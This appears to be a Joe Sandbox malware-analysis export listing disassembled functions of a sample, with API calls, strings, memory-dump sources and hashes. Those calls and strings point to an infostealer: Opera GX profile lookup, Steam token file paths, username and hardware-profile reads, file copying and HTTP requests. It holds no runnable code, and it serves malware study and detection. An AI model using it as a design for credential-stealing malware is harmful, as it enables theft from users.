Part of subcall function 6C285B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C2856EE,?,00000001), ref: 6C285B85
Part of subcall function 6C285B50: EnterCriticalSection.KERNEL32(6C2EF688,?,?,?,6C2856EE,?,00000001), ref: 6C285B90
Part of subcall function 6C285B50: LeaveCriticalSection.KERNEL32(6C2EF688,?,?,?,6C2856EE,?,00000001), ref: 6C285BD8
Part of subcall function 6C285B50: GetTickCount64.KERNEL32 ref: 6C285BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C2630BE

Part of subcall function 6C2630F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C263127
Part of subcall function 6C2630F0: __aulldiv.LIBCMT ref: 6C263140

Part of subcall function 6C29AB2A: __onexit.LIBCMT ref: 6C29AB30

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: cf820f107c74e3dd5d1e08ea788e1693e0e329119467cbcad1a9cb8b0d6c37ef
Instruction ID: c08eb2cf752a22c235bdd947226a2298ac489a3e7aaeaff8f1bd4642cfdb9f34
Opcode Fuzzy Hash: cf820f107c74e3dd5d1e08ea788e1693e0e329119467cbcad1a9cb8b0d6c37ef
Instruction Fuzzy Hash: 45F0D612E2074897CB50DF3598451AB7370AFAF214B101719EC6473591FF2062D8C392

Function 00411090 Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 004110A5
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004110C0
CloseHandle.KERNEL32(00000000), ref: 004110C7

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 7d2f98029f2b61cd18fc45e6196706e3f12086fc559905c746de43c3997a7fbf
Instruction ID: 1c08e919c02a254b4b37d860c04ab18dc4e81f8fecafc94af7ba70b0d8b08a1d
Opcode Fuzzy Hash: 7d2f98029f2b61cd18fc45e6196706e3f12086fc559905c746de43c3997a7fbf
Instruction Fuzzy Hash: 56F06576A016286BDB20AB589C46FDE776CEF04B14F005195FF08A7290DBB46D848BD9

Function 0040FAE0 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417612,004201E9), ref: 0040FAEC
HeapAlloc.KERNEL32(00000000,?,?,?,00417612,004201E9), ref: 0040FAF3
GetUserNameA.ADVAPI32(00000000,004201E9), ref: 0040FB07

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 8218fe93c7511915d8ea69b2df3f7555064dccbdcf9b0fba1e292445f5964255
Instruction ID: 78103743301cbd06d6d8d66bd0cdb6708e3bc561754f37119468ce18e8306284
Opcode Fuzzy Hash: 8218fe93c7511915d8ea69b2df3f7555064dccbdcf9b0fba1e292445f5964255
Instruction Fuzzy Hash: 8FD012B1601218BBE7109BD4AC0DFDABBACDB05765F4001A1FA05D2241D5B0594087E5

Function 0040D000 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

StrCmpCA.SHLWAPI(00000000,Opera GX,004201E9,004201E9,?), ref: 0040D037

Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00410D10: GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D

Strings

Opera GX, xrefs: 0040D023

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: Opera GX
API String ID: 1719890681-3280151751
Opcode ID: 0e0a4ba23d3d81cdde82448c46b74a8f3f6161f3e6c380c2b59e8c2835eea34d
Instruction ID: 878ea3d55aa325650e3ef9eb940674a8195e6d8f65bb4788ec79313c0214d067
Opcode Fuzzy Hash: 0e0a4ba23d3d81cdde82448c46b74a8f3f6161f3e6c380c2b59e8c2835eea34d
Instruction Fuzzy Hash: 2AD11F72910108ABCB14FBA1D952DEE7778AF54304F50813EF806765D2EB38AA0CCAA5

Function 00412EE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00405010: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405062
Part of subcall function 00405010: StrCmpCA.SHLWAPI(?,0251B748,?,?,?,?,?,?,?), ref: 0040507A
Part of subcall function 00405010: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A2
Part of subcall function 00405010: HttpOpenRequestA.WININET(00000000,GET,?,0251D9A0,00000000,00000000,-00400100,00000000), ref: 004050DC
Part of subcall function 00405010: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405100
Part of subcall function 00405010: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040510F

StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,?,00413AD4), ref: 00412F20

Strings

ERROR, xrefs: 00412F12, 00412F4A

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR
API String ID: 3287882509-2861137601
Opcode ID: 7ba359a6d487f4f705be48227c2b6aaed084a340333159b79fd650385dc61544
Instruction ID: b53bf029f71d461a7cd9a980bfe8ed76a20664019d00161f83185fc2695e4cb7
Opcode Fuzzy Hash: 7ba359a6d487f4f705be48227c2b6aaed084a340333159b79fd650385dc61544
Instruction Fuzzy Hash: 3211303261010867CB24FF72E8529DD3768AE10708F40817EF805779D2EF386A0DCAD9

Function 004103E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(00000000), ref: 004103EB

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Strings

Unknown, xrefs: 0041040A

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: CurrentProfilelstrcpy
String ID: Unknown
API String ID: 2831436455-1654365787
Opcode ID: 7f2f59503834969d570c94138c9a6e52f3934a8309e6d6cc72abeb6884dea8a3
Instruction ID: 19cb3bbfcee307e431a48a4cc2986d0f4610495d139a97f2bc99e78c6af915a2
Opcode Fuzzy Hash: 7f2f59503834969d570c94138c9a6e52f3934a8309e6d6cc72abeb6884dea8a3
Instruction Fuzzy Hash: B8E08033F04128534A207BA87C018DE776CDB44755710427FFD05D7241DB69995547D9

Function 004113C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 004113F6

Strings

itA, xrefs: 004113C6

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: itA
API String ID: 3080627654-4073710665
Opcode ID: 2fb46c26f5f968991f922a738bdbc9de65da063d6d4be4973441e1e0646e2ffc
Instruction ID: 47f133316ba314d8bc1974dd8499d7c493aee8c37ab345ebc4d0dd79a7219a22
Opcode Fuzzy Hash: 2fb46c26f5f968991f922a738bdbc9de65da063d6d4be4973441e1e0646e2ffc
Instruction Fuzzy Hash: 62E0AEB0E0420C9FCB44DFA8D8006AEBBF8EF48300F40816AD808E7341E77586118B99

Function 004161A0 Relevance: 3.1, APIs: 2, Instructions: 124stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004161D7
lstrcatA.KERNEL32(?,0251E2D0), ref: 004161F2

Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415EBC
Part of subcall function 00415EA0: FindFirstFileA.KERNEL32(?,?), ref: 00415ED3
Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201DC), ref: 00415EFC
Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201D8), ref: 00415F16
Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F3B
Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201E9), ref: 00415F4A
Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F67
Part of subcall function 00415EA0: PathMatchSpecA.SHLWAPI(?,?), ref: 00415F97
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,0251B6F8,?,000003E8), ref: 00415FC3
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,004201E0), ref: 00415FD5
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,?), ref: 00415FE3
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,004201E0), ref: 00415FF5
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,?), ref: 00416009

Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F86
Part of subcall function 00415EA0: CopyFileA.KERNEL32(?,00000000,00000001), ref: 004160AA
Part of subcall function 00415EA0: DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004201E9), ref: 00416119

Part of subcall function 00415EA0: FindNextFileA.KERNEL32(?,?), ref: 00416160
Part of subcall function 00415EA0: FindClose.KERNEL32(?), ref: 00416172

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 3e39c8340cd0fc017df8ad2fd27600d5a2e10f03fb3b98640748308a1605b62e
Instruction ID: 98d42b3406129106ca52e3ce68672895595a1a21ef3683531b9833437f7f45f5
Opcode Fuzzy Hash: 3e39c8340cd0fc017df8ad2fd27600d5a2e10f03fb3b98640748308a1605b62e
Instruction Fuzzy Hash: 4B41C375E002086BCB24FBB1DC43DFE377AABC4304F44451EF90562191EAB85B88CBA6

Function 00414400 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 53stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

lstrlenA.KERNEL32(00000000,00000000,?,00000000,004201E9,?,?,?,00416ED8,?,?), ref: 0041443F

Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399

Strings

Soft\Steam\steam_tokens.txt, xrefs: 00414454

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 2356188485-3507145866
Opcode ID: 0ae9c2c25decbaabb95120c833515e8b1e900ae9dcce575bd64fc1390b8e8a52
Instruction ID: 081c47b6d937ec40d6c996030d6839391ee10078badbf5345814b8fee0ffd502
Opcode Fuzzy Hash: 0ae9c2c25decbaabb95120c833515e8b1e900ae9dcce575bd64fc1390b8e8a52
Instruction Fuzzy Hash: 9A11D6739141086ADB14FBB2DC539EE773CAE50348F50857EB506728D2EF38664CC6A9

Function 00410DA0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC

Strings

&0A, xrefs: 00410DAE

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: &0A
API String ID: 3494564517-488416437
Opcode ID: 5e0d39f90cc3e526f1afed404e6c67091f8f40804da1df45c8e31fe95fd0f0a1
Instruction ID: 1b95d1e3e19af54c2c1672544d43783d0ab56fa141ae32e5822aae5f418e4f6d
Opcode Fuzzy Hash: 5e0d39f90cc3e526f1afed404e6c67091f8f40804da1df45c8e31fe95fd0f0a1
Instruction Fuzzy Hash: 53F0E5367006151B871209ADA840AA3F7AEEFD9E60714416BEA48EB395DAA5ECC043E4

Function 004063D0 Relevance: 2.6, APIs: 2, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,0040688E,00000000), ref: 0040642F
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,0040688E,00000000), ref: 00406463

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6b9bd58a76f6015017861676f4f1b4d3ec2be9568ed5fca8a091e83d2bed6ce3
Instruction ID: 25d565d5ee4a4702b91c68662a662a7ad42dfcb8a2de35b795cdf97fb66203ee
Opcode Fuzzy Hash: 6b9bd58a76f6015017861676f4f1b4d3ec2be9568ed5fca8a091e83d2bed6ce3
Instruction Fuzzy Hash: 9321B4717407105BC334CBB9CC81BA7B7EAEBC0714F14453EEA5ADB3D0D679A8408648

Function 00406840 Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
